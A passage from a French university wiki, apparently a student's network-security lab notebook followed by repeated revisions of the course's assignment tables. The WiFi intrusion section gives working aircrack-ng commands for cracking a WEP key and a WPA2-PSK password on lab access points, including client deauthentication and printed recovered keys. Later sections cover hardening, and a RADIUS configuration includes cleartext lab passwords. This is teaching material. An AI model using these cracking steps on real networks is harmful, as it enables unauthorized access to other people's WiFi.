};

# Redémarrage et vérification
systemctl restart bind9
dig @localhost msalhi.online DNSKEY +dnssec</syntaxhighlight>

=== Résultat des clés DNSSEC générées ===

<pre>; Clés obtenues via : dig @localhost msalhi.online DNSKEY +dnssec

msalhi.online. 3600 IN DNSKEY 256 3 13 Mi9LJ2JnnUciYfGEXoDuZ0ElzOigo+Fjxhf2I1+zxZqcn7SN1FxxGfFJ v4xNsU/YTvGgzf7ZWgWa29b+OQOSug==
msalhi.online. 3600 IN DNSKEY 257 3 13 QrPmyYhhAVx1TGYLWRtAx/LbhQPy3yMd5/GoMH5SZ4aWD72QGVrfBOhh HW0/c1dYroeZ9riJTyQcO859svIWRw==
msalhi.online. 3600 IN DNSKEY 257 3 13 Z4LE6oWmFPOb+QzklArdW7HWkH6kVrjIgrKYrJBMW3n6sMwwEG1YruHe SvmXJ9GwuFxhqtRu130iPse3wrJqyQ==</pre>

=== Enregistrement de la KSK chez Gandi ===

{| class="wikitable"
|+ Configuration DNSSEC chez Gandi
|-
! style="text-align: left;"| '''Paramètre'''
! style="text-align: left;"| '''Valeur'''
|-
| style="text-align: left;"| Algorithm
| style="text-align: left;"| 13 (ECDSAP256SHA256)
|-
| style="text-align: left;"| Flags
| style="text-align: left;"| 257 (KSK)
|-
| style="text-align: left;"| Public Key
| style="text-align: left;"| QrPmyYhhAVx1TGYLWRtAx/LbhQPy3yMd5/GoMH5SZ4aWD72QGVrfBOhhHW0/c1dYroeZ9riJTyQcO859svIWRw==
|}

= Effraction WiFi =

== Cassage de clef WEP d’un point d’accès WiFi ==
Le réseau cible était <code>cracotte01</code> (BSSID <code>04:DA:D2:9C:50:50</code>, canal 4). La procédure a été réalisée depuis la machine <code>zabeth13</code> avec les outils <code>aircrack-ng</code>.

<ol>
<li>Passage de la carte en mode monitor :
<syntaxhighlight lang="bash">sudo airmon-ng start wlan0</syntaxhighlight>
</li>
<li>Capture ciblée :
<syntaxhighlight lang="bash">sudo airodump-ng -c 4 --bssid 04:DA:D2:9C:50:50 -w capture_wep wlan0mon</syntaxhighlight>
</li>
<li>Authentification fake (association au point d’accès) :
<syntaxhighlight lang="bash">sudo aireplay-ng -1 6000 -o 1 -q 10 -e cracotte01 -a 04:DA:D2:9C:50:50 -h a0:b3:39:5a:dc:c8 wlan0mon</syntaxhighlight>
</li>
<li>Attaque ARP replay pour générer du trafic :
<syntaxhighlight lang="bash">sudo aireplay-ng -3 -b 04:DA:D2:9C:50:50 -h a0:b3:39:5a:dc:c8 wlan0mon</syntaxhighlight>
</li>
<li>Après accumulation d’environ 40 000 IVs, lancement de aircrack‑ng :
<syntaxhighlight lang="bash">sudo aircrack-ng capture_wep-01.cap</syntaxhighlight>
</li>
</ol>

La clé WEP a été trouvée en moins de 15 minutes : <code>FF:FF:FF:FF:FA:BC:02:CB:AE:EE:EE:EE:EE</code>.

== Cassage de mot de passe WPA‑PSK par force brute ==
Le réseau <code>kracotte01</code> (BSSID <code>44:AD:D9:5F:87:00</code>, canal 13) utilisait WPA2‑PSK.

<ol>
<li>Capture ciblée :
<syntaxhighlight lang="bash">sudo airodump-ng -c 13 --bssid 44:AD:D9:5F:87:00 -w wpa_capture wlan0mon</syntaxhighlight>
</li>
<li>Désauthentification d’un client (identifié <code>40:A5:EF:01:25:8B</code>) pour forcer un handshake :
<syntaxhighlight lang="bash">sudo aireplay-ng -0 10 -a 44:AD:D9:5F:87:00 -c 40:A5:EF:01:25:8B wlan0mon</syntaxhighlight>
</li>
<li>Après apparition du message '''“WPA handshake”''' dans <code>airodump‑ng</code>, lancement de l’attaque par dictionnaire (mots de passe à 8 chiffres) :
<syntaxhighlight lang="bash">crunch 8 8 0123456789 | sudo aircrack-ng -b 44:AD:D9:5F:87:00 -w - wpa_capture-06.cap</syntaxhighlight>
</li>
<li>Résultat : le mot de passe <code>66689666</code> a été découvert après environ 30 minutes.</li>
</ol>

Ces tests illustrent la vulnérabilité des protocoles WEP et des mots de passe courts face à des attaques par force brute.

----

= Sécurisations =

== Chiffrement de données ==
Sur Moon, une partition supplémentaire (disque virtuel <code>xvdb</code>, correspondant au volume LVM <code>SE4.Moon.home</code>) a été chiffrée avec LUKS.

<syntaxhighlight lang="bash">
# Chiffrement de la partition
cryptsetup luksFormat /dev/xvdb

# Ouverture du conteneur
cryptsetup open /dev/xvdb home_crypt

# Création d’un système de fichiers
mkfs.ext4 /dev/mapper/home_crypt

# Montage manuel
mount /dev/mapper/home_crypt /mnt/secret
</syntaxhighlight>

Pour automatiser le montage au démarrage, on ajoute dans <code>/etc/crypttab</code> :
<pre>
home_crypt /dev/xvdb none luks
</pre>
et dans <code>/etc/fstab</code> :
<pre>
/dev/mapper/home_crypt /home ext4 defaults 0 2
</pre>

Le mot de passe doit être saisi manuellement à chaque démarrage, ce qui est acceptable pour un serveur de test.

== Filtrage des services – fail2ban ==
Pour protéger SSH et les requêtes DNS malveillantes, <code>fail2ban</code> a été installé sur Moon et Solstice.

Fichier <code>/etc/fail2ban/jail.local</code> :
<pre>
[DEFAULT]
bantime = 3600
findtime = 600
maxretry = 3

[sshd]
enabled = true
port = ssh
filter = sshd
logpath = /var/log/auth.log
maxretry = 3

[named-refused-tcp]
enabled = true
port = domain,953
protocol = tcp
filter = named-refused
logpath = /var/log/named/security.log
maxretry = 3
</pre>

Filtre <code>/etc/fail2ban/filter.d/named-refused.conf</code> :
<pre>
[Definition]
failregex = ^\S+ named\[\d+\]: client <HOST>#\S+ .* query .* denied
ignoreregex =
</pre>

Le service est démarré et activé :
<syntaxhighlight lang="bash">
systemctl enable fail2ban
systemctl restart fail2ban
</syntaxhighlight>

== Sécurisation WiFi par WPA2‑EAP ==

=== Serveur FreeRADIUS sur Moon ===
Installation :
<syntaxhighlight lang="bash">
apt install freeradius freeradius-utils -y
</syntaxhighlight>

Ajout du client (point d’accès) dans <code>/etc/freeradius/3.0/clients.conf</code> :
<pre>
client cisco_ap_salhi {
ipaddr = 10.60.15.0/24
secret = radius_secret_salhi_2026
shortname = cisco-ap
nas_type = cisco
}
</pre>

Création d’un utilisateur dans <code>/etc/freeradius/3.0/users</code> :
<pre>
"msalhi" Cleartext-Password := "WifiSecure2026!"
Reply-Message = "Bienvenue sur le WiFi SE4 - Mohamed Salhi"
Tunnel-Type = VLAN,
Tunnel-Medium-Type = IEEE-802,
Tunnel-Private-Group-Id = 25
</pre>

Configuration EAP pour PEAP‑MSCHAPv2 dans <code>/etc/freeradius/3.0/mods-enabled/eap</code> (type par défaut <code>peap</code>, tunnel intérieur <code>mschapv2</code>).
Un conflit de port (18120) a été résolu en commentant la section <code>listen</code> dans <code>/etc/freeradius/3.0/sites-enabled/inner-tunnel</code> (ou en mettant <code>port = 0</code>).

Test local :
<syntaxhighlight lang="bash">
radtest msalhi WifiSecure2026! localhost 0 testing123
</syntaxhighlight>
→ réponse <code>Access-Accept</code> attendue.

=== Configuration du point d’accès WiFi ===
Sur le point d’accès (wifi‑E304), les lignes suivantes ont été ajoutées (en conservant les configurations des autres étudiants) :
<syntaxhighlight lang="cisco">
aaa group server radius radius_student25
server 192.168.20.2 auth-port 1812 acct-port 1813

aaa authentication login eap_student25 group radius_student25

dot11 ssid VM_SERVICES_15
vlan 25
authentication open eap eap_student25
authentication network-eap eap_student25
authentication key-management wpa version 2
mbssid guest-mode

interface Dot11Radio0
encryption vlan 25 mode ciphers aes-ccm
ssid VM_SERVICES_15

interface Dot11Radio0.25
encapsulation dot1Q 25
bridge-group 25

interface GigabitEthernet0.25
encapsulation dot1Q 25
bridge-group 25

radius-server host 192.168.20.2 auth-port 1812 acct-port 1813 key radius_secret_salhi_2026
</syntaxhighlight>

=== Configuration DHCP sur les routeurs ===
Sur '''E304''' (plage 100‑150) :
<syntaxhighlight lang="cisco">
ip dhcp excluded-address 10.60.15.1 10.60.15.99
ip dhcp excluded-address 10.60.15.151 10.60.15.254

ip dhcp pool SALHI_VLAN25
network 10.60.15.0 255.255.255.0
default-router 10.60.15.1
dns-server 192.168.20.2 8.8.8.8
domain-name msalhi.online
lease 0 12
</syntaxhighlight>

Sur '''E306''' (plage 151‑200), configuration similaire avec une plage différente.

=== Policy‑Based Routing (PBR) ===
Pour que le trafic IPv4 du VLAN 25 passe par Solstice (où il sera NATé vers Internet), on a configuré sur E304 :

<syntaxhighlight lang="cisco">
ip access-list extended TRAFIC_VLAN25
permit ip 10.60.15.0 0.0.0.255 any
!
route-map PBR_VLAN25 permit 10
match ip address TRAFIC_VLAN25
set ip next-hop 193.48.57.167
!
interface Vlan25
ip policy route-map PBR_VLAN25
</syntaxhighlight>

Cette politique force tout le trafic IPv4 du VLAN 25 vers Solstice. La mascarade a ensuite été élargie sur Solstice pour inclure ce réseau :
<syntaxhighlight lang="bash">
iptables -t nat -A POSTROUTING -s 10.60.15.0/24 -o eth1 -j MASQUERADE
iptables-save > /etc/iptables/rules.v4
</syntaxhighlight>

=== Tests ===
Un client connecté au SSID <code>VM_SERVICES_15</code> obtient une adresse IP dans la plage DHCP (ex. <code>10.60.15.101</code>), peut résoudre des noms DNS (via Moon) et accéder à Internet. Le traceroute montre le passage par Solstice (<code>193.48.57.167</code>).

Atelier SysRes SE4 2025/2026 E15

2026-02-25T19:08:33Z

Msalhi : /* Configuration chez le registrar Gandi */

Atelier SysRes SE4 2025/2026 E15

2026-02-25T19:06:12Z

Msalhi : /* Configuration du serveur secondaire (Solstice) */

Atelier SysRes SE4 2025/2026 E15

2026-02-25T19:05:06Z

Msalhi : /* Configuration du serveur maître (Moon) */

SE4 IdO sécurité système/réseau 2025/2026

2026-02-10T15:29:35Z

Msalhi : /* Plan d'adressage */

= Répartition des binômes pour les travaux pratiques "administration système et réseau" =

Préfixe des noms de machine : <code>SE4</code>.

Domaines Internet à louer sur [[gandi.net]]. Identifiant <code>pifou</code>. Regardez le montant prévu sur le compte avant de louer un domaine.

{| class="wikitable"
! Cahier !! Elève !! Nom de domaine
! Nom de machine de services !! Nom de machine mandataire
|-
| [[Atelier SysRes SE4 2025/2026 E1 | Cahier n°1]] || Pierre CASIMIRI || merteuil.tech || SE4.Merteuil||SE4.Rosemonde
|-
| [[Atelier SysRes SE4 2025/2026 E2 | Cahier n°2]] || Agathe HOUDUSSE || valmont.tech || SE4.Valmont||SE4.Rosemonde
|-
| [[Atelier SysRes SE4 2025/2026 E3 | Cahier n°3]] || Lilia GHAZALI || kirchhoff.live|| SE4.Tension||SE4.Kirchhoff
|-
| [[Atelier SysRes SE4 2025/2026 E4 | Cahier n°4]] || Marin GOURVEST || courant.online|| SE4.Courant||SE4.Kirchhoff
|-
| [[Atelier SysRes SE4 2025/2026 E5 | Cahier n°5]] || Cédric PAYET || archlinuxbtw.lol|| SE4.CachyOS||SE4.LinusTorvalds
|-
| [[Atelier SysRes SE4 2025/2026 E6 | Cahier n°6]] || Thomas DELOBELLE || archlinux.lol|| SE4.Manjaro||SE4.LinusTorvalds
|-
| [[Atelier SysRes SE4 2025/2026 E7 | Cahier n°7]] || Ibrahim TEPELI || c2vts.fr|| SE4.C2||SE4.Garage
|-
| [[Atelier SysRes SE4 2025/2026 E8 | Cahier n°8]] || Yassine YAHIANI || rs7.online|| SE4.RS7||SE4.Garage
|-
| [[Atelier SysRes SE4 2025/2026 E9 | Cahier n°9]] || Aurèle VANGHELUWE || tompere.online|| SE4-Tompere1||SE4-Tompere0
|-
| [[Atelier SysRes SE4 2025/2026 E10 | Cahier n°10]] || Tom MERIEN || tompere2.xyz|| SE4-Tompere2||SE4-Tompere0
|-
| [[Atelier SysRes SE4 2025/2026 E11 | Cahier n°11]] || Varesse Evora Souop Metse || elvis21.shop|| SE4.Elf||SE4.RockStar
|-
| [[Atelier SysRes SE4 2025/2026 E12 | Cahier n°12]] || Mario Sylainx S. GAUTHIER || kasav.online|| SE4.Kasav||SE4.RockStar
|-
| [[Atelier SysRes SE4 2025/2026 E13 | Cahier n°13]] || Billel Cheklat || deadpool.tech|| SE4.catwoman||SE4.superman
|-
| [[Atelier SysRes SE4 2025/2026 E14 | Cahier n°14]] || Antonin Biernacki || deadpool.tech|| SE4.batman||SE4.superman
|-
| [[Atelier SysRes SE4 2025/2026 E15 | Cahier n°15]] || Mohamed Salhi || msalhi.online|| SE4.Moon||SE4.Solstice
|-
|}

{| class="wikitable"
! Nom machine mandataire !! IPv4 publique machine mandataire !! Elèves
|-
| SE4.Rosemonde|| 193.48.57.165|| Pierre CASIMIRI & Agathe HOUDUSSE
|-
| SE4.Kirchhoff|| 193.48.57.171|| Lilia GHAZALI & Marin GOURVEST
|-
| SE4.LinusTorvalds|| 193.48.57.166|| Cédric PAYET & Thomas DELOBELLE
|-
| SE4.Garage|| 193.48.57.170|| Ibrahim TEPELI & Yassine YAHIANI
|-
| SE4-Tompere0|| 193.48.57.168|| Aurèle VANGHELUWE & Tom MERIEN
|-
| SE4.superman|| 193.48.57.169|| Billel Cheklat & Antonin Biernacki
|-
| SE4.RockStar|| 193.48.57.172|| Varesse Evora Souop Metse & GAUTHIER Mario Sylainx S.
|-
| SE4.Solstice|| <code>193.48.57.167</code>|| Mohamed Salhi
|-
|}

= Tableau des commutateurs virtuels =

{| class="wikitable"
! Noms des élèves !! Nom du fichier de configuration !! Réseau IPv4 utilisé
|-
| CASIMIRI / HOUDUSSE || pont_gercourt || 192.168.3.0/24
|-
|PAYET / DELOBELLE
|pont_pacman
|192.168.10.0/24
|-
|MERIEN / VANGHELUWE
|pont_pere
|192.168.0.0/24
|-
|CHEKLAT / BIERNACKI
|pont_ironman
|192.168.69.0/24
|-
|SALHI
|pont_msalhi
|192.168.20.0/24
|-
|GOURVEST/GHAZALI
|pont_diviseur
|192.168.67.0/24
|-
|YAHIANI / TEPELI
|pontclio
|192.168.7.0/24
|-
|GAUTHIER / SOUOP METSE
|pont_rock
|192.168.50.0/24
|}

= Tableau des réseaux virtuels =

VLAN privés :

{| class="wikitable"
! Nom !! Numéro
|-
| VLAN1 || 1
|-
| MV-PROMO || 2
|-
|E1-Pierre
|11
|-
|E2-Agathe
|12
|-
|E5-Cedric
|15
|-
|E6-Thomas
|16
|-
|E9-Aurele
|19
|-
|E10-Tom
|20
|-
|E15-MSalhi
|25
|}

VLAN communs avec l'école :

{| class="wikitable"
! Nom !! Numéro
|-
| INTERCO1 || 530
|-
|}

= Schéma de câblage =

Vous avez des éléments réseaux et des panneaux de brassage fibres dans les locaux techniques SR31 et SR52 ainsi que dans les salles E304 et E306.

Le plan doit donc comporter, pour chaque connexion, les locaux d'origine et de destination ainsi que l'identifiant des ports d'origine et de destination.

= Plan d'adressage =

{| class="wikitable"
! Nom VLAN !! Réseau IPv4 !! Réseau IPv6
|-
| MV-PROMO || <code>193.48.57.160/27</code> || </code>2001:660:4401:60a0::/64</code>
|-
| PoolPierre || <code>10.60.1.0/24</code> || </code>2001:660:4401:60a1::/64</code>
|-
| PoolAgathe || <code>10.60.2.0/24</code> || </code>2001:660:4401:60a2::/64</code>
|-
|PoolCédric
|<code>10.60.5.0/24</code>
|2001:660:4401:60a5::/64
|-
|PoolThomas
|<code>10.60.6.0/24</code>
|2001:660:4401:60a6::/64
|-
|PoolSalhi
|<code>10.60.15.0/24</code>
|2001:660:4401:60b1::/64
|}

Adresses IPv4 des éléments réseau dans VLAN1

{| class="wikitable"
! Elément !! Adresse
|-
| Routeur C9200-E304 || 172.27.0.1/16
|-
| Routeur C9200-E306 || 172.27.0.2/16
|-
| Borne Wi-Fi E306 || 172.27.0.3/16
|-
| Borne Wi-Fi E304 || 172.27.0.4/16
|-
|}

= Informations VRRP =

Pour chaque VLAN et pour chaque instance VRRP dans le VLAN listez les adresses IPv4 propres ainsi que l'unique IPv4 virtuelle.

== VLAN des machines virtuelles ==

Une seule instance VRRP dans le VLAN des machines virtuelles.

Adresse IPv4 virtuelle : <code>193.48.57.162</code>

{| class="wikitable"
! Routeur !! IPv4 propre
|-
| C9200 E304 || <code>193.48.57.163</code>
|-
| C9200 E306 || <code>193.48.57.164</code>
|-
|}

== VLAN ... ==

SE4 IdO sécurité système/réseau 2025/2026

2026-02-10T15:29:20Z

Msalhi : /* Plan d'adressage */

= Répartition des binômes pour les travaux pratiques "administration système et réseau" =

Préfixe des noms de machine : <code>SE4</code>.

Domaines Internet à louer sur [[gandi.net]]. Identifiant <code>pifou</code>. Regardez le montant prévu sur le compte avant de louer un domaine.

{| class="wikitable"
! Cahier !! Elève !! Nom de domaine
! Nom de machine de services !! Nom de machine mandataire
|-
| [[Atelier SysRes SE4 2025/2026 E1 | Cahier n°1]] || Pierre CASIMIRI || merteuil.tech || SE4.Merteuil||SE4.Rosemonde
|-
| [[Atelier SysRes SE4 2025/2026 E2 | Cahier n°2]] || Agathe HOUDUSSE || valmont.tech || SE4.Valmont||SE4.Rosemonde
|-
| [[Atelier SysRes SE4 2025/2026 E3 | Cahier n°3]] || Lilia GHAZALI || kirchhoff.live|| SE4.Tension||SE4.Kirchhoff
|-
| [[Atelier SysRes SE4 2025/2026 E4 | Cahier n°4]] || Marin GOURVEST || courant.online|| SE4.Courant||SE4.Kirchhoff
|-
| [[Atelier SysRes SE4 2025/2026 E5 | Cahier n°5]] || Cédric PAYET || archlinuxbtw.lol|| SE4.CachyOS||SE4.LinusTorvalds
|-
| [[Atelier SysRes SE4 2025/2026 E6 | Cahier n°6]] || Thomas DELOBELLE || archlinux.lol|| SE4.Manjaro||SE4.LinusTorvalds
|-
| [[Atelier SysRes SE4 2025/2026 E7 | Cahier n°7]] || Ibrahim TEPELI || c2vts.fr|| SE4.C2||SE4.Garage
|-
| [[Atelier SysRes SE4 2025/2026 E8 | Cahier n°8]] || Yassine YAHIANI || rs7.online|| SE4.RS7||SE4.Garage
|-
| [[Atelier SysRes SE4 2025/2026 E9 | Cahier n°9]] || Aurèle VANGHELUWE || tompere.online|| SE4-Tompere1||SE4-Tompere0
|-
| [[Atelier SysRes SE4 2025/2026 E10 | Cahier n°10]] || Tom MERIEN || tompere2.xyz|| SE4-Tompere2||SE4-Tompere0
|-
| [[Atelier SysRes SE4 2025/2026 E11 | Cahier n°11]] || Varesse Evora Souop Metse || elvis21.shop|| SE4.Elf||SE4.RockStar
|-
| [[Atelier SysRes SE4 2025/2026 E12 | Cahier n°12]] || Mario Sylainx S. GAUTHIER || kasav.online|| SE4.Kasav||SE4.RockStar
|-
| [[Atelier SysRes SE4 2025/2026 E13 | Cahier n°13]] || Billel Cheklat || deadpool.tech|| SE4.catwoman||SE4.superman
|-
| [[Atelier SysRes SE4 2025/2026 E14 | Cahier n°14]] || Antonin Biernacki || deadpool.tech|| SE4.batman||SE4.superman
|-
| [[Atelier SysRes SE4 2025/2026 E15 | Cahier n°15]] || Mohamed Salhi || msalhi.online|| SE4.Moon||SE4.Solstice
|-
|}

{| class="wikitable"
! Nom machine mandataire !! IPv4 publique machine mandataire !! Elèves
|-
| SE4.Rosemonde|| 193.48.57.165|| Pierre CASIMIRI & Agathe HOUDUSSE
|-
| SE4.Kirchhoff|| 193.48.57.171|| Lilia GHAZALI & Marin GOURVEST
|-
| SE4.LinusTorvalds|| 193.48.57.166|| Cédric PAYET & Thomas DELOBELLE
|-
| SE4.Garage|| 193.48.57.170|| Ibrahim TEPELI & Yassine YAHIANI
|-
| SE4-Tompere0|| 193.48.57.168|| Aurèle VANGHELUWE & Tom MERIEN
|-
| SE4.superman|| 193.48.57.169|| Billel Cheklat & Antonin Biernacki
|-
| SE4.RockStar|| 193.48.57.172|| Varesse Evora Souop Metse & GAUTHIER Mario Sylainx S.
|-
| SE4.Solstice|| <code>193.48.57.167</code>|| Mohamed Salhi
|-
|}

= Tableau des commutateurs virtuels =

{| class="wikitable"
! Noms des élèves !! Nom du fichier de configuration !! Réseau IPv4 utilisé
|-
| CASIMIRI / HOUDUSSE || pont_gercourt || 192.168.3.0/24
|-
|PAYET / DELOBELLE
|pont_pacman
|192.168.10.0/24
|-
|MERIEN / VANGHELUWE
|pont_pere
|192.168.0.0/24
|-
|CHEKLAT / BIERNACKI
|pont_ironman
|192.168.69.0/24
|-
|SALHI
|pont_msalhi
|192.168.20.0/24
|-
|GOURVEST/GHAZALI
|pont_diviseur
|192.168.67.0/24
|-
|YAHIANI / TEPELI
|pontclio
|192.168.7.0/24
|-
|GAUTHIER / SOUOP METSE
|pont_rock
|192.168.50.0/24
|}

= Tableau des réseaux virtuels =

VLAN privés :

{| class="wikitable"
! Nom !! Numéro
|-
| VLAN1 || 1
|-
| MV-PROMO || 2
|-
|E1-Pierre
|11
|-
|E2-Agathe
|12
|-
|E5-Cedric
|15
|-
|E6-Thomas
|16
|-
|E9-Aurele
|19
|-
|E10-Tom
|20
|-
|E15-MSalhi
|25
|}

VLAN communs avec l'école :

{| class="wikitable"
! Nom !! Numéro
|-
| INTERCO1 || 530
|-
|}

= Schéma de câblage =

Vous avez des éléments réseaux et des panneaux de brassage fibres dans les locaux techniques SR31 et SR52 ainsi que dans les salles E304 et E306.

Le plan doit donc comporter, pour chaque connexion, les locaux d'origine et de destination ainsi que l'identifiant des ports d'origine et de destination.

= Plan d'adressage =

{| class="wikitable"
! Nom VLAN !! Réseau IPv4 !! Réseau IPv6
|-
| MV-PROMO || <code>193.48.57.160/27</code> || </code>2001:660:4401:60a0::/64</code>
|-
| PoolPierre || <code>10.60.1.0/24</code> || </code>2001:660:4401:60a1::/64</code>
|-
| PoolAgathe || <code>10.60.2.0/24</code> || </code>2001:660:4401:60a2::/64</code>
|-
|PoolCédric
|<code>10.60.5.0/24</code>
|2001:660:4401:60a5::/64
|-
|PoolThomas
|<code>10.60.6.0/24</code>
|2001:660:4401:60a6::/64
|-
|PoolSalhi
|10.60.15.0/24
|2001:660:4401:60b1::/64
|}

Adresses IPv4 des éléments réseau dans VLAN1

{| class="wikitable"
! Elément !! Adresse
|-
| Routeur C9200-E304 || 172.27.0.1/16
|-
| Routeur C9200-E306 || 172.27.0.2/16
|-
| Borne Wi-Fi E306 || 172.27.0.3/16
|-
| Borne Wi-Fi E304 || 172.27.0.4/16
|-
|}

= Informations VRRP =

Pour chaque VLAN et pour chaque instance VRRP dans le VLAN listez les adresses IPv4 propres ainsi que l'unique IPv4 virtuelle.

== VLAN des machines virtuelles ==

Une seule instance VRRP dans le VLAN des machines virtuelles.

Adresse IPv4 virtuelle : <code>193.48.57.162</code>

{| class="wikitable"
! Routeur !! IPv4 propre
|-
| C9200 E304 || <code>193.48.57.163</code>
|-
| C9200 E306 || <code>193.48.57.164</code>
|-
|}

== VLAN ... ==

SE4 IdO sécurité système/réseau 2025/2026

2026-02-10T13:59:26Z

Msalhi : /* Tableau des réseaux virtuels */

= Répartition des binômes pour les travaux pratiques "administration système et réseau" =

Préfixe des noms de machine : <code>SE4</code>.

Domaines Internet à louer sur [[gandi.net]]. Identifiant <code>pifou</code>. Regardez le montant prévu sur le compte avant de louer un domaine.

{| class="wikitable"
! Cahier !! Elève !! Nom de domaine
! Nom de machine de services !! Nom de machine mandataire
|-
| [[Atelier SysRes SE4 2025/2026 E1 | Cahier n°1]] || Pierre CASIMIRI || merteuil.tech || SE4.Merteuil||SE4.Rosemonde
|-
| [[Atelier SysRes SE4 2025/2026 E2 | Cahier n°2]] || Agathe HOUDUSSE || valmont.tech || SE4.Valmont||SE4.Rosemonde
|-
| [[Atelier SysRes SE4 2025/2026 E3 | Cahier n°3]] || Lilia GHAZALI || kirchhoff.live|| SE4.Tension||SE4.Kirchhoff
|-
| [[Atelier SysRes SE4 2025/2026 E4 | Cahier n°4]] || Marin GOURVEST || courant.online|| SE4.Courant||SE4.Kirchhoff
|-
| [[Atelier SysRes SE4 2025/2026 E5 | Cahier n°5]] || Cédric PAYET || archlinuxbtw.lol|| SE4.CachyOS||SE4.LinusTorvalds
|-
| [[Atelier SysRes SE4 2025/2026 E6 | Cahier n°6]] || Thomas DELOBELLE || archlinux.lol|| SE4.Manjaro||SE4.LinusTorvalds
|-
| [[Atelier SysRes SE4 2025/2026 E7 | Cahier n°7]] || Ibrahim TEPELI || c2vts.fr|| SE4.C2||SE4.Garage
|-
| [[Atelier SysRes SE4 2025/2026 E8 | Cahier n°8]] || Yassine YAHIANI || rs7.online|| SE4.RS7||SE4.Garage
|-
| [[Atelier SysRes SE4 2025/2026 E9 | Cahier n°9]] || Aurèle VANGHELUWE || tompere.online|| SE4-Tompere1||SE4-Tompere0
|-
| [[Atelier SysRes SE4 2025/2026 E10 | Cahier n°10]] || Tom MERIEN || tompere2.xyz|| SE4-Tompere2||SE4-Tompere0
|-
| [[Atelier SysRes SE4 2025/2026 E11 | Cahier n°11]] || Varesse Evora Souop Metse || elvis21.shop|| SE4.Elf||SE4.RockStar
|-
| [[Atelier SysRes SE4 2025/2026 E12 | Cahier n°12]] || Mario Sylainx S. GAUTHIER || kasav.online|| SE4.Kasav||SE4.RockStar
|-
| [[Atelier SysRes SE4 2025/2026 E13 | Cahier n°13]] || Billel Cheklat || deadpool.tech|| SE4.catwoman||SE4.superman
|-
| [[Atelier SysRes SE4 2025/2026 E14 | Cahier n°14]] || Antonin Biernacki || deadpool.tech|| SE4.batman||SE4.superman
|-
| [[Atelier SysRes SE4 2025/2026 E15 | Cahier n°15]] || Mohamed Salhi || msalhi.online|| SE4.Moon||SE4.Solstice
|-
|}

{| class="wikitable"
! Nom machine mandataire !! IPv4 publique machine mandataire !! Elèves
|-
| SE4.Rosemonde|| 193.48.57.165|| Pierre CASIMIRI & Agathe HOUDUSSE
|-
| SE4.Kirchhoff|| 193.48.57.171|| Lilia GHAZALI & Marin GOURVEST
|-
| SE4.LinusTorvalds|| 193.48.57.166|| Cédric PAYET & Thomas DELOBELLE
|-
| SE4.Garage|| 193.48.57.170|| Ibrahim TEPELI & Yassine YAHIANI
|-
| SE4-Tompere0|| 193.48.57.168|| Aurèle VANGHELUWE & Tom MERIEN
|-
| SE4.superman|| 193.48.57.169|| Billel Cheklat & Antonin Biernacki
|-
| SE4.RockStar|| 193.48.57.172|| Varesse Evora Souop Metse & GAUTHIER Mario Sylainx S.
|-
| SE4.Solstice|| <code>193.48.57.167</code>|| Mohamed Salhi
|-
|}

= Tableau des commutateurs virtuels =

{| class="wikitable"
! Noms des élèves !! Nom du fichier de configuration !! Réseau IPv4 utilisé
|-
| CASIMIRI / HOUDUSSE || pont_gercourt || 192.168.3.0/24
|-
|PAYET / DELOBELLE
|pont_pacman
|192.168.10.0/24
|-
|MERIEN / VANGHELUWE
|pont_pere
|192.168.0.0/24
|-
|CHEKLAT / BIERNACKI
|pont_ironman
|192.168.69.0/24
|-
|SALHI
|pont_msalhi
|192.168.20.0/24
|-
|GOURVEST/GHAZALI
|pont_diviseur
|192.168.67.0/24
|-
|YAHIANI / TEPELI
|pontclio
|192.168.7.0/24
|-
|GAUTHIER / SOUOP METSE
|pont_rock
|192.168.50.0/24
|}

= Tableau des réseaux virtuels =

VLAN privés :

{| class="wikitable"
! Nom !! Numéro
|-
| VLAN1 || 1
|-
| MV-PROMO || 2
|-
|E1_Pierre
|11
|-
|E2_Agathe
|12
|-
|E15_MSalhi
|25
|}

VLAN communs avec l'école :

{| class="wikitable"
! Nom !! Numéro
|-
| INTERCO1 || 530
|-
|}

= Schéma de câblage =

Vous avez des éléments réseaux et des panneaux de brassage fibres dans les locaux techniques SR31 et SR52 ainsi que dans les salles E304 et E306.

Le plan doit donc comporter, pour chaque connexion, les locaux d'origine et de destination ainsi que l'identifiant des ports d'origine et de destination.

= Plan d'adressage =

{| class="wikitable"
! Nom VLAN !! Réseau IPv4 !! Réseau IPv6
|-
| MV-PROMO || <code>193.48.57.160/27</code> || </code>2001:660:4401:60a0::/64</code>
|-
|}

Adresses IPv4 des éléments réseau dans VLAN1

{| class="wikitable"
! Elément !! Adresse
|-
| Routeur C9200-E304 || 172.27.0.1/16
|-
| Routeur C9200-E306 || 172.27.0.2/16
|-
| Borne Wi-Fi E306 || 172.27.0.3/16
|-
| Borne Wi-Fi E304 || 172.27.0.4/16
|-
|}

= Informations VRRP =

Pour chaque VLAN et pour chaque instance VRRP dans le VLAN listez les adresses IPv4 propres ainsi que l'unique IPv4 virtuelle.

== VLAN des machines virtuelles ==

Une seule instance VRRP dans le VLAN des machines virtuelles.

Adresse IPv4 virtuelle : <code>193.48.57.162</code>

{| class="wikitable"
! Routeur !! IPv4 propre
|-
| C9200 E304 || <code>193.48.57.163</code>
|-
| C9200 E306 || <code>193.48.57.164</code>
|-
|}

== VLAN ... ==

SE4 IdO sécurité système/réseau 2025/2026

2026-02-10T13:52:50Z

Msalhi : /* Tableau des réseaux virtuels */

= Répartition des binômes pour les travaux pratiques "administration système et réseau" =

Préfixe des noms de machine : <code>SE4</code>.

Domaines Internet à louer sur [[gandi.net]]. Identifiant <code>pifou</code>. Regardez le montant prévu sur le compte avant de louer un domaine.

{| class="wikitable"
! Cahier !! Elève !! Nom de domaine
! Nom de machine de services !! Nom de machine mandataire
|-
| [[Atelier SysRes SE4 2025/2026 E1 | Cahier n°1]] || Pierre CASIMIRI || merteuil.tech || SE4.Merteuil||SE4.Rosemonde
|-
| [[Atelier SysRes SE4 2025/2026 E2 | Cahier n°2]] || Agathe HOUDUSSE || valmont.tech || SE4.Valmont||SE4.Rosemonde
|-
| [[Atelier SysRes SE4 2025/2026 E3 | Cahier n°3]] || Lilia GHAZALI || kirchhoff.live|| SE4.Tension||SE4.Kirchhoff
|-
| [[Atelier SysRes SE4 2025/2026 E4 | Cahier n°4]] || Marin GOURVEST || courant.online|| SE4.Courant||SE4.Kirchhoff
|-
| [[Atelier SysRes SE4 2025/2026 E5 | Cahier n°5]] || Cédric PAYET || archlinuxbtw.lol|| SE4.CachyOS||SE4.LinusTorvalds
|-
